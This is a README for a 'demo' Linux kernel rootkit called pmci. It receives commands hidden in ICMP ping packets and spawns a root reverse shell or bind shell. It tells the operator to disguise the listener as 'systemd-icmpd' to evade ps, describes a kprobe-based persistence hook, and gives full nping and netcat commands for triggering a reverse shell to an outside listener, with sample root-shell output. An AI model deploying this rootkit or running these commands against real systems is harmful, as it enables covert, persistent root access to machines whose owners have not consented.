# pmci - Pings Make C2 Interesting

A demo rootkit, with C2 over ICMP, and the capability to:
- start a reverse shell
- start a bind shell

On load, the kernel module forks off a userspace program as root, which listens for crafted ICMP packets.

The end of an ICMP packet contains a variable-length "data" section.

On receiving an ICMP echo request, the listener checks the data portion of the ICMP packet, and if it matches a specified format, `pmci rs <HOST> <PORT>`, will open a TCP connection to the specified address, and then `exec` a reverse shell over that socket.

## setup

Since the ICMP listener is a userspace program, the kernel module needs to know where to find it.
Before compiling, modify the definition for `ICMP_PATH` at the top of `src/kern.c` to the location where the `icmpshell` binary will be installed on the target which is running the rootkit.

## ICMP C2

The ICMP listener binary is named `systemd-icmpd`, so that it does not look out of place in the output of `ps` on a systemd-based system.

- Start a listener, e.g. with netcat: `nc -lvk 5555`.
- Send a ping message with the special data format: `sudo nping --icmp -c 1 -dest-ip <IP_OF_DEVICE_RUNNING_KERN> --data-string 'pmci rs <LISTENING_IP> <LISTENING_PORT>'`.
  - i.e. to tell an instance of the rootkit running on `127.0.0.1` to connect to a reverse shell running on `127.0.0.1:5555`, do: `sudo nping --icmp -c 1 -dest-ip 127.0.0.1 --data-string 'pmci rs 127.0.0.1 5555`.

The resulting connection is a standard TCP connection using the same network stack available to all userspace programs. I have tested that it works with no issue over the internet, using DNS hostnames for connection.

When the shell connects back to the listener, it will send `HELLO`, and then initiate the shell:

```
Connection received on localhost 45154
HELLO.
sh-4.4# whoami
whoami
root
```

## Commands

- `rs <LISTENING_IP> <LISTENING_PORT>`: connects to the given address and TCP port and spawns a shell
- `bs <BIND_PORT>`: binds to the given TCP port on all addresses, and starts accepting connections. Spawns a shell when connections are accepted.

## Persistence

As long as the module is loaded, it will do its best to keep comms up.

When `pmci` is initialized, it registers a hook with the kernel's `kprobe` system to detect the `exit` syscall.

If the probed `exit` syscall is from the process that is listening for ICMP C2 commands, `pmci` knows that the listener has exited, and will automatically restart it.
